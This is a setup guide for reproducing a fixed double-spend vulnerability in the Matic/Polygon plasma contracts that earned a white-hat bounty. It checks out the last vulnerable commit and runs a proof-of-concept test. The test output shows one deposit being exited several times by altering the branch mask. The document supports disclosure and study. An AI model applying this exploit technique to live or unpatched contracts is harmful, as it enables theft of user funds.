- $2M white hat hacker bounty paid
- Writeup here
- The commit that fixes it is here
- It was merged here. Latest should not exhibit the bug.
718bf86fada5dbd2fedcea0184a59921a625f356should exhibit the bug.
git clone https://github.com/maticnetwork/contracts.git matic_contractscp DoubleSpendRepro.test.js matic_contracts/test/integration/root/predicates/cd matic_contractsgit checkout 718bf86fada5dbd2fedcea0184a59921a625f356This is the last commit before it was fixed.- Install dependencies:
sudo apt install gcc g++ make python - Install nvm
nvm install 8.11.3nvm use 8.11.3node --versionshould be 8.11.3npm install- Install Docker
- Fix Docker permissions here
- Compile the test network:
npm run template:process -- --bor-chain-id 80001 npm run truffle:compile, should seeCompiled successfully using:
- Run the main chain:
npm run testrpc - Run the matic sidechain:
npm run bor:simulate, or stop an existing matic sidechain:npm run bor:clean - Deploy the contracts:
npm run truffle:migrate - Set the command to only run our unit test, modify
npm testin package.json to execute:truffle test test/integration/root/predicates/DoubleSpendRepro.test.js --migrations_directory migrations_null - Run tests:
npm test. Note that runningnpm testruns the migration. - You will see this output:
Contract: ReproduceDoubleSpendBug
reproduceDoubleSpendBug
Deposit amount: 10000000000000000000
Before transfer root tokens: 0
Before transfer child tokens: 0
Before deposit root tokens: 10000000000000000000
Before deposit child tokens: 0
After deposit root tokens: 0
After deposit child tokens: 10000000000000000000
After withdraw root tokens: 0
After withdraw child tokens: 0
Branch mask:0x0080
After exit transaction root tokens: 0
After exit transaction child tokens: 0
After process exit root tokens: 10000000000000000000
After process exit child tokens: 0
Branch mask:0x0180
After exit transaction root tokens: 10000000000000000000
After exit transaction child tokens: 0
After process exit root tokens: 20000000000000000000
After process exit child tokens: 0
Branch mask:0x0280
After exit transaction root tokens: 20000000000000000000
After exit transaction child tokens: 0
After process exit root tokens: 30000000000000000000
After process exit child tokens: 0
The above successfully shows the attack where the user has withdrawn their tokens multiple times on the same deposit.
- It takes me 2min33s to run my test, how do I improve this iteration time? It's caused by truffle's migrations and deploys on every run.
- Why do I have to disable the bor chain id check in Root.sol? It's something to do with the test net setup
- Why do I not have to wait the 7 day challenge period to get the tokens back on the Ethereum side in my unit testing? Is something disabling it in the test net?